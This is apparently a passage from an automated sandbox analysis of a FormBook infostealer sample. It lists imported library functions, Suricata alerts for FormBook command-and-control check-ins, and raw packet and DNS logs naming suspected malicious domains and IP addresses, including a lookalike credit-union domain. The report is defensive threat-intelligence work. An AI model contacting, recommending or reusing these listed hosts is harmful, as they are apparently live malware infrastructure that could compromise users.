                                                                  OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit

                                                                  Possible Origin

                                                                  Language of compilation systemCountry where language is spokenMap
                                                                  EnglishGreat Britain
                                                                  EnglishUnited States

                                                                  Network Behavior

                                                                  Suricata IDS Alerts

                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                  2024-10-08T14:18:23.711338+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449752156.226.22.23380TCP
                                                                  2024-10-08T14:19:07.778511+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449883176.32.38.14180TCP
                                                                  2024-10-08T14:19:21.281956+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450011199.192.21.16980TCP
                                                                  2024-10-08T14:19:43.467409+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4500153.33.130.19080TCP
                                                                  2024-10-08T14:19:56.641348+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45001984.32.84.3280TCP
                                                                  2024-10-08T14:20:26.593067+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4500233.33.130.19080TCP

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Oct 8, 2024 14:18:22.784291983 CEST4975280192.168.2.4156.226.22.233
                                                                  Oct 8, 2024 14:18:22.790307045 CEST8049752156.226.22.233192.168.2.4
                                                                  Oct 8, 2024 14:18:22.790380955 CEST4975280192.168.2.4156.226.22.233
                                                                  Oct 8, 2024 14:18:22.795846939 CEST4975280192.168.2.4156.226.22.233
                                                                  Oct 8, 2024 14:18:22.801677942 CEST8049752156.226.22.233192.168.2.4
                                                                  Oct 8, 2024 14:18:23.711133003 CEST8049752156.226.22.233192.168.2.4
                                                                  Oct 8, 2024 14:18:23.711251974 CEST8049752156.226.22.233192.168.2.4
                                                                  Oct 8, 2024 14:18:23.711338043 CEST4975280192.168.2.4156.226.22.233
                                                                  Oct 8, 2024 14:18:23.714071035 CEST4975280192.168.2.4156.226.22.233
                                                                  Oct 8, 2024 14:18:23.719486952 CEST8049752156.226.22.233192.168.2.4
                                                                  Oct 8, 2024 14:18:38.780239105 CEST4983580192.168.2.4176.32.38.141
                                                                  Oct 8, 2024 14:18:38.785202026 CEST8049835176.32.38.141192.168.2.4
                                                                  Oct 8, 2024 14:18:38.785279036 CEST4983580192.168.2.4176.32.38.141
                                                                  Oct 8, 2024 14:18:38.799689054 CEST4983580192.168.2.4176.32.38.141
                                                                  Oct 8, 2024 14:18:38.804788113 CEST8049835176.32.38.141192.168.2.4
                                                                  Oct 8, 2024 14:18:40.301646948 CEST4983580192.168.2.4176.32.38.141
                                                                  Oct 8, 2024 14:18:40.350461006 CEST8049835176.32.38.141192.168.2.4
                                                                  Oct 8, 2024 14:18:41.319967031 CEST4985580192.168.2.4176.32.38.141
                                                                  Oct 8, 2024 14:18:41.325597048 CEST8049855176.32.38.141192.168.2.4
                                                                  Oct 8, 2024 14:18:41.325663090 CEST4985580192.168.2.4176.32.38.141
                                                                  Oct 8, 2024 14:18:41.334286928 CEST4985580192.168.2.4176.32.38.141
                                                                  Oct 8, 2024 14:18:41.339081049 CEST8049855176.32.38.141192.168.2.4
                                                                  Oct 8, 2024 14:18:42.848463058 CEST4985580192.168.2.4176.32.38.141
                                                                  Oct 8, 2024 14:18:42.894622087 CEST8049855176.32.38.141192.168.2.4
                                                                  Oct 8, 2024 14:18:43.868683100 CEST4986880192.168.2.4176.32.38.141
                                                                  Oct 8, 2024 14:18:43.874206066 CEST8049868176.32.38.141192.168.2.4
                                                                  Oct 8, 2024 14:18:43.874280930 CEST4986880192.168.2.4176.32.38.141
                                                                  Oct 8, 2024 14:18:43.886420012 CEST4986880192.168.2.4176.32.38.141
                                                                  Oct 8, 2024 14:18:43.891412020 CEST8049868176.32.38.141192.168.2.4
                                                                  Oct 8, 2024 14:18:43.891510963 CEST8049868176.32.38.141192.168.2.4
                                                                  Oct 8, 2024 14:18:43.891551971 CEST8049868176.32.38.141192.168.2.4
                                                                  Oct 8, 2024 14:18:43.891644955 CEST8049868176.32.38.141192.168.2.4
                                                                  Oct 8, 2024 14:18:43.891658068 CEST8049868176.32.38.141192.168.2.4
                                                                  Oct 8, 2024 14:18:43.891669989 CEST8049868176.32.38.141192.168.2.4
                                                                  Oct 8, 2024 14:18:43.891683102 CEST8049868176.32.38.141192.168.2.4
                                                                  Oct 8, 2024 14:18:43.891695023 CEST8049868176.32.38.141192.168.2.4
                                                                  Oct 8, 2024 14:18:43.891727924 CEST8049868176.32.38.141192.168.2.4
                                                                  Oct 8, 2024 14:18:45.395361900 CEST4986880192.168.2.4176.32.38.141
                                                                  Oct 8, 2024 14:18:45.442595005 CEST8049868176.32.38.141192.168.2.4
                                                                  Oct 8, 2024 14:18:46.415446043 CEST4988380192.168.2.4176.32.38.141
                                                                  Oct 8, 2024 14:18:46.420562983 CEST8049883176.32.38.141192.168.2.4
                                                                  Oct 8, 2024 14:18:46.420712948 CEST4988380192.168.2.4176.32.38.141
                                                                  Oct 8, 2024 14:18:46.428065062 CEST4988380192.168.2.4176.32.38.141
                                                                  Oct 8, 2024 14:18:46.432996035 CEST8049883176.32.38.141192.168.2.4
                                                                  Oct 8, 2024 14:19:00.160063028 CEST8049835176.32.38.141192.168.2.4
                                                                  Oct 8, 2024 14:19:00.160307884 CEST4983580192.168.2.4176.32.38.141
                                                                  Oct 8, 2024 14:19:02.685916901 CEST8049855176.32.38.141192.168.2.4
                                                                  Oct 8, 2024 14:19:02.685997963 CEST4985580192.168.2.4176.32.38.141
                                                                  Oct 8, 2024 14:19:05.249144077 CEST8049868176.32.38.141192.168.2.4
                                                                  Oct 8, 2024 14:19:05.249238014 CEST4986880192.168.2.4176.32.38.141
                                                                  Oct 8, 2024 14:19:07.778364897 CEST8049883176.32.38.141192.168.2.4
                                                                  Oct 8, 2024 14:19:07.778511047 CEST4988380192.168.2.4176.32.38.141
                                                                  Oct 8, 2024 14:19:07.779436111 CEST4988380192.168.2.4176.32.38.141
                                                                  Oct 8, 2024 14:19:07.785010099 CEST8049883176.32.38.141192.168.2.4
                                                                  Oct 8, 2024 14:19:13.007934093 CEST5000880192.168.2.4199.192.21.169
                                                                  Oct 8, 2024 14:19:13.013506889 CEST8050008199.192.21.169192.168.2.4
                                                                  Oct 8, 2024 14:19:13.013602972 CEST5000880192.168.2.4199.192.21.169
                                                                  Oct 8, 2024 14:19:13.027817011 CEST5000880192.168.2.4199.192.21.169
                                                                  Oct 8, 2024 14:19:13.032823086 CEST8050008199.192.21.169192.168.2.4
                                                                  Oct 8, 2024 14:19:13.616738081 CEST8050008199.192.21.169192.168.2.4
                                                                  Oct 8, 2024 14:19:13.616782904 CEST8050008199.192.21.169192.168.2.4
                                                                  Oct 8, 2024 14:19:13.616863012 CEST5000880192.168.2.4199.192.21.169
                                                                  Oct 8, 2024 14:19:14.536144972 CEST5000880192.168.2.4199.192.21.169
                                                                  Oct 8, 2024 14:19:15.557195902 CEST5000980192.168.2.4199.192.21.169
                                                                  Oct 8, 2024 14:19:15.562267065 CEST8050009199.192.21.169192.168.2.4
                                                                  Oct 8, 2024 14:19:15.562350988 CEST5000980192.168.2.4199.192.21.169
                                                                  Oct 8, 2024 14:19:15.572783947 CEST5000980192.168.2.4199.192.21.169
                                                                  Oct 8, 2024 14:19:15.578805923 CEST8050009199.192.21.169192.168.2.4
                                                                  Oct 8, 2024 14:19:16.182003021 CEST8050009199.192.21.169192.168.2.4
                                                                  Oct 8, 2024 14:19:16.182907104 CEST8050009199.192.21.169192.168.2.4
                                                                  Oct 8, 2024 14:19:16.182956934 CEST5000980192.168.2.4199.192.21.169
                                                                  Oct 8, 2024 14:19:17.082894087 CEST5000980192.168.2.4199.192.21.169
                                                                  Oct 8, 2024 14:19:18.101880074 CEST5001080192.168.2.4199.192.21.169
                                                                  Oct 8, 2024 14:19:18.107125044 CEST8050010199.192.21.169192.168.2.4
                                                                  Oct 8, 2024 14:19:18.107208014 CEST5001080192.168.2.4199.192.21.169
                                                                  Oct 8, 2024 14:19:18.120992899 CEST5001080192.168.2.4199.192.21.169
                                                                  Oct 8, 2024 14:19:18.125906944 CEST8050010199.192.21.169192.168.2.4
                                                                  Oct 8, 2024 14:19:18.125940084 CEST8050010199.192.21.169192.168.2.4
                                                                  Oct 8, 2024 14:19:18.125953913 CEST8050010199.192.21.169192.168.2.4
                                                                  Oct 8, 2024 14:19:18.125967026 CEST8050010199.192.21.169192.168.2.4
                                                                  Oct 8, 2024 14:19:18.126152039 CEST8050010199.192.21.169192.168.2.4
                                                                  Oct 8, 2024 14:19:18.126166105 CEST8050010199.192.21.169192.168.2.4
                                                                  Oct 8, 2024 14:19:18.126178980 CEST8050010199.192.21.169192.168.2.4
                                                                  Oct 8, 2024 14:19:18.126337051 CEST8050010199.192.21.169192.168.2.4
                                                                  Oct 8, 2024 14:19:18.126494884 CEST8050010199.192.21.169192.168.2.4
                                                                  Oct 8, 2024 14:19:18.706728935 CEST8050010199.192.21.169192.168.2.4
                                                                  Oct 8, 2024 14:19:18.706918955 CEST8050010199.192.21.169192.168.2.4
                                                                  Oct 8, 2024 14:19:18.707005978 CEST5001080192.168.2.4199.192.21.169
                                                                  Oct 8, 2024 14:19:19.629714012 CEST5001080192.168.2.4199.192.21.169
                                                                  Oct 8, 2024 14:19:20.647825956 CEST5001180192.168.2.4199.192.21.169
                                                                  Oct 8, 2024 14:19:20.653778076 CEST8050011199.192.21.169192.168.2.4
                                                                  Oct 8, 2024 14:19:20.653865099 CEST5001180192.168.2.4199.192.21.169
                                                                  Oct 8, 2024 14:19:20.659512997 CEST5001180192.168.2.4199.192.21.169
                                                                  Oct 8, 2024 14:19:20.664557934 CEST8050011199.192.21.169192.168.2.4
                                                                  Oct 8, 2024 14:19:21.278870106 CEST8050011199.192.21.169192.168.2.4
                                                                  Oct 8, 2024 14:19:21.279442072 CEST8050011199.192.21.169192.168.2.4
                                                                  Oct 8, 2024 14:19:21.281955957 CEST5001180192.168.2.4199.192.21.169
                                                                  Oct 8, 2024 14:19:21.281956911 CEST5001180192.168.2.4199.192.21.169
                                                                  Oct 8, 2024 14:19:21.291090965 CEST8050011199.192.21.169192.168.2.4
                                                                  Oct 8, 2024 14:19:34.384512901 CEST5001280192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:19:34.390933037 CEST80500123.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:19:34.391005039 CEST5001280192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:19:34.403327942 CEST5001280192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:19:34.408489943 CEST80500123.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:19:34.855583906 CEST80500123.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:19:34.855640888 CEST5001280192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:19:35.911531925 CEST5001280192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:19:35.917527914 CEST80500123.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:19:36.930773973 CEST5001380192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:19:36.936045885 CEST80500133.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:19:36.936121941 CEST5001380192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:19:36.946455002 CEST5001380192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:19:36.951440096 CEST80500133.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:19:38.458194971 CEST5001380192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:19:38.463773012 CEST80500133.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:19:38.463823080 CEST5001380192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:19:39.476738930 CEST5001480192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:19:39.483072996 CEST80500143.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:19:39.483247995 CEST5001480192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:19:39.495529890 CEST5001480192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:19:39.500416040 CEST80500143.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:19:39.500473976 CEST80500143.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:19:39.500525951 CEST80500143.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:19:39.500555038 CEST80500143.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:19:39.500587940 CEST80500143.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:19:39.500636101 CEST80500143.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:19:39.500663996 CEST80500143.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:19:39.500690937 CEST80500143.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:19:39.500719070 CEST80500143.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:19:39.940665960 CEST80500143.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:19:39.945913076 CEST5001480192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:19:41.004734039 CEST5001480192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:19:41.009896994 CEST80500143.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:19:42.024537086 CEST5001580192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:19:42.029800892 CEST80500153.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:19:42.035618067 CEST5001580192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:19:42.037537098 CEST5001580192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:19:42.042535067 CEST80500153.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:19:43.465883017 CEST80500153.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:19:43.466574907 CEST80500153.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:19:43.467408895 CEST5001580192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:19:43.468411922 CEST5001580192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:19:43.474503994 CEST80500153.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:19:48.529968977 CEST5001680192.168.2.484.32.84.32
                                                                  Oct 8, 2024 14:19:48.535007000 CEST805001684.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:48.535070896 CEST5001680192.168.2.484.32.84.32
                                                                  Oct 8, 2024 14:19:48.545311928 CEST5001680192.168.2.484.32.84.32
                                                                  Oct 8, 2024 14:19:48.550528049 CEST805001684.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:49.021306038 CEST805001684.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:49.021404982 CEST5001680192.168.2.484.32.84.32
                                                                  Oct 8, 2024 14:19:50.053539991 CEST5001680192.168.2.484.32.84.32
                                                                  Oct 8, 2024 14:19:50.058880091 CEST805001684.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:51.069788933 CEST5001780192.168.2.484.32.84.32
                                                                  Oct 8, 2024 14:19:51.075198889 CEST805001784.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:51.075432062 CEST5001780192.168.2.484.32.84.32
                                                                  Oct 8, 2024 14:19:51.084002972 CEST5001780192.168.2.484.32.84.32
                                                                  Oct 8, 2024 14:19:51.089219093 CEST805001784.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:51.535839081 CEST805001784.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:51.538605928 CEST5001780192.168.2.484.32.84.32
                                                                  Oct 8, 2024 14:19:52.598484993 CEST5001780192.168.2.484.32.84.32
                                                                  Oct 8, 2024 14:19:52.603261948 CEST805001784.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:53.618611097 CEST5001880192.168.2.484.32.84.32
                                                                  Oct 8, 2024 14:19:53.623570919 CEST805001884.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:53.627614021 CEST5001880192.168.2.484.32.84.32
                                                                  Oct 8, 2024 14:19:53.639532089 CEST5001880192.168.2.484.32.84.32
                                                                  Oct 8, 2024 14:19:53.644536018 CEST805001884.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:53.644567966 CEST805001884.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:53.644576073 CEST805001884.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:53.645231009 CEST805001884.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:53.645240068 CEST805001884.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:53.645246983 CEST805001884.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:53.645250082 CEST805001884.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:53.645252943 CEST805001884.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:53.645256042 CEST805001884.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:54.089215994 CEST805001884.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:54.095535040 CEST5001880192.168.2.484.32.84.32
                                                                  Oct 8, 2024 14:19:55.145564079 CEST5001880192.168.2.484.32.84.32
                                                                  Oct 8, 2024 14:19:55.150844097 CEST805001884.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:56.166920900 CEST5001980192.168.2.484.32.84.32
                                                                  Oct 8, 2024 14:19:56.172429085 CEST805001984.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:56.172497988 CEST5001980192.168.2.484.32.84.32
                                                                  Oct 8, 2024 14:19:56.180372000 CEST5001980192.168.2.484.32.84.32
                                                                  Oct 8, 2024 14:19:56.185410976 CEST805001984.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:56.641262054 CEST805001984.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:56.641294003 CEST805001984.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:56.641304016 CEST805001984.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:56.641315937 CEST805001984.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:56.641328096 CEST805001984.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:56.641339064 CEST805001984.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:56.641350031 CEST805001984.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:56.641347885 CEST5001980192.168.2.484.32.84.32
                                                                  Oct 8, 2024 14:19:56.641418934 CEST5001980192.168.2.484.32.84.32
                                                                  Oct 8, 2024 14:19:56.641437054 CEST5001980192.168.2.484.32.84.32
                                                                  Oct 8, 2024 14:19:56.641935110 CEST805001984.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:56.641944885 CEST805001984.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:56.641956091 CEST805001984.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:56.641968966 CEST5001980192.168.2.484.32.84.32
                                                                  Oct 8, 2024 14:19:56.641997099 CEST5001980192.168.2.484.32.84.32
                                                                  Oct 8, 2024 14:19:56.648366928 CEST5001980192.168.2.484.32.84.32
                                                                  Oct 8, 2024 14:19:56.653604984 CEST805001984.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:20:17.839540005 CEST5002080192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:20:17.844429016 CEST80500203.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:17.846064091 CEST5002080192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:20:17.854618073 CEST5002080192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:20:17.859424114 CEST80500203.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:18.324790001 CEST80500203.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:18.324853897 CEST5002080192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:20:19.364371061 CEST5002080192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:20:19.707858086 CEST5002080192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:20:20.358031034 CEST80500203.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:20.358042955 CEST80500203.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:20.358114004 CEST5002080192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:20:20.402312040 CEST5002180192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:20:20.578967094 CEST80500213.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:20.579040051 CEST5002180192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:20:20.592905045 CEST5002180192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:20:20.597750902 CEST80500213.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:21.055676937 CEST80500213.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:21.055768013 CEST5002180192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:20:22.099119902 CEST5002180192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:20:22.225018024 CEST80500213.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:23.123080015 CEST5002280192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:20:23.459491014 CEST80500223.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:23.467550993 CEST5002280192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:20:23.475444078 CEST5002280192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:20:23.480285883 CEST80500223.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:23.480305910 CEST80500223.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:23.480309963 CEST80500223.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:23.480314016 CEST80500223.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:23.480386972 CEST80500223.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:23.480396986 CEST80500223.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:23.480453014 CEST80500223.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:23.480460882 CEST80500223.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:23.480473995 CEST80500223.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:24.989150047 CEST5002280192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:20:24.994601965 CEST80500223.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:24.994652033 CEST5002280192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:20:26.007857084 CEST5002380192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:20:26.012877941 CEST80500233.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:26.013020992 CEST5002380192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:20:26.021681070 CEST5002380192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:20:26.027211905 CEST80500233.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:26.592878103 CEST80500233.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:26.592982054 CEST80500233.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:26.592992067 CEST80500233.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:26.593066931 CEST5002380192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:20:26.595278025 CEST5002380192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:20:26.600347996 CEST80500233.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:32.157586098 CEST5002480192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:20:32.162533998 CEST80500243.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:32.163671970 CEST5002480192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:20:32.172312975 CEST5002480192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:20:32.177203894 CEST80500243.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:32.620474100 CEST80500243.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:32.623568058 CEST5002480192.168.2.43.33.130.190

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Oct 8, 2024 14:18:22.732892036 CEST6368253192.168.2.41.1.1.1
                                                                  Oct 8, 2024 14:18:22.779189110 CEST53636821.1.1.1192.168.2.4
                                                                  Oct 8, 2024 14:18:38.757663965 CEST5825353192.168.2.41.1.1.1
                                                                  Oct 8, 2024 14:18:38.777872086 CEST53582531.1.1.1192.168.2.4
                                                                  Oct 8, 2024 14:19:12.790566921 CEST6484653192.168.2.41.1.1.1
                                                                  Oct 8, 2024 14:19:13.004214048 CEST53648461.1.1.1192.168.2.4
                                                                  Oct 8, 2024 14:19:26.291313887 CEST6443053192.168.2.41.1.1.1
                                                                  Oct 8, 2024 14:19:26.306682110 CEST53644301.1.1.1192.168.2.4
                                                                  Oct 8, 2024 14:19:34.368849993 CEST5617353192.168.2.41.1.1.1
                                                                  Oct 8, 2024 14:19:34.381663084 CEST53561731.1.1.1192.168.2.4
                                                                  Oct 8, 2024 14:19:48.477114916 CEST4969053192.168.2.41.1.1.1
                                                                  Oct 8, 2024 14:19:48.527544975 CEST53496901.1.1.1192.168.2.4
                                                                  Oct 8, 2024 14:20:01.664063931 CEST5576153192.168.2.41.1.1.1
                                                                  Oct 8, 2024 14:20:01.676971912 CEST53557611.1.1.1192.168.2.4
                                                                  Oct 8, 2024 14:20:09.746516943 CEST6120153192.168.2.41.1.1.1
                                                                  Oct 8, 2024 14:20:09.763539076 CEST53612011.1.1.1192.168.2.4
                                                                  Oct 8, 2024 14:20:17.821336985 CEST6162953192.168.2.41.1.1.1
                                                                  Oct 8, 2024 14:20:17.835716009 CEST53616291.1.1.1192.168.2.4
                                                                  Oct 8, 2024 14:20:31.931428909 CEST5704053192.168.2.41.1.1.1
                                                                  Oct 8, 2024 14:20:32.152512074 CEST53570401.1.1.1192.168.2.4

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Oct 8, 2024 14:18:22.732892036 CEST192.168.2.41.1.1.10xd54dStandard query (0)www.nad5.shopA (IP address)IN (0x0001)false
                                                                  Oct 8, 2024 14:18:38.757663965 CEST192.168.2.41.1.1.10xd16aStandard query (0)www.impo232rt.xyzA (IP address)IN (0x0001)false
                                                                  Oct 8, 2024 14:19:12.790566921 CEST192.168.2.41.1.1.10xee57Standard query (0)www.cenfresh.lifeA (IP address)IN (0x0001)false
                                                                  Oct 8, 2024 14:19:26.291313887 CEST192.168.2.41.1.1.10x856fStandard query (0)www.trafegomagico.shopA (IP address)IN (0x0001)false
                                                                  Oct 8, 2024 14:19:34.368849993 CEST192.168.2.41.1.1.10x54a7Standard query (0)www.digitalbloom.infoA (IP address)IN (0x0001)false
                                                                  Oct 8, 2024 14:19:48.477114916 CEST192.168.2.41.1.1.10x9c65Standard query (0)www.thepeatear.onlineA (IP address)IN (0x0001)false
                                                                  Oct 8, 2024 14:20:01.664063931 CEST192.168.2.41.1.1.10x6b6aStandard query (0)www.mktimediato.onlineA (IP address)IN (0x0001)false
                                                                  Oct 8, 2024 14:20:09.746516943 CEST192.168.2.41.1.1.10x9749Standard query (0)www.schoolsfrirstfcu.orgA (IP address)IN (0x0001)false
                                                                  Oct 8, 2024 14:20:17.821336985 CEST192.168.2.41.1.1.10x1acdStandard query (0)www.crowsecurity.cloudA (IP address)IN (0x0001)false
                                                                  Oct 8, 2024 14:20:31.931428909 CEST192.168.2.41.1.1.10xf003Standard query (0)www.myjiorooms.servicesA (IP address)IN (0x0001)false

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Oct 8, 2024 14:18:22.779189110 CEST1.1.1.1192.168.2.40xd54dNo error (0)www.nad5.shop156.226.22.233A (IP address)IN (0x0001)false
                                                                  Oct 8, 2024 14:18:38.777872086 CEST1.1.1.1192.168.2.40xd16aNo error (0)www.impo232rt.xyz176.32.38.141A (IP address)IN (0x0001)false
                                                                  Oct 8, 2024 14:19:13.004214048 CEST1.1.1.1192.168.2.40xee57No error (0)www.cenfresh.life199.192.21.169A (IP address)IN (0x0001)false
                                                                  Oct 8, 2024 14:19:26.306682110 CEST1.1.1.1192.168.2.40x856fServer failure (2)www.trafegomagico.shopnonenoneA (IP address)IN (0x0001)false
                                                                  Oct 8, 2024 14:19:34.381663084 CEST1.1.1.1192.168.2.40x54a7No error (0)www.digitalbloom.infodigitalbloom.infoCNAME (Canonical name)IN (0x0001)false
                                                                  Oct 8, 2024 14:19:34.381663084 CEST1.1.1.1192.168.2.40x54a7No error (0)digitalbloom.info3.33.130.190A (IP address)IN (0x0001)false
                                                                  Oct 8, 2024 14:19:34.381663084 CEST1.1.1.1192.168.2.40x54a7No error (0)digitalbloom.info15.197.148.33A (IP address)IN (0x0001)false
                                                                  Oct 8, 2024 14:19:48.527544975 CEST1.1.1.1192.168.2.40x9c65No error (0)www.thepeatear.onlinethepeatear.onlineCNAME (Canonical name)IN (0x0001)false
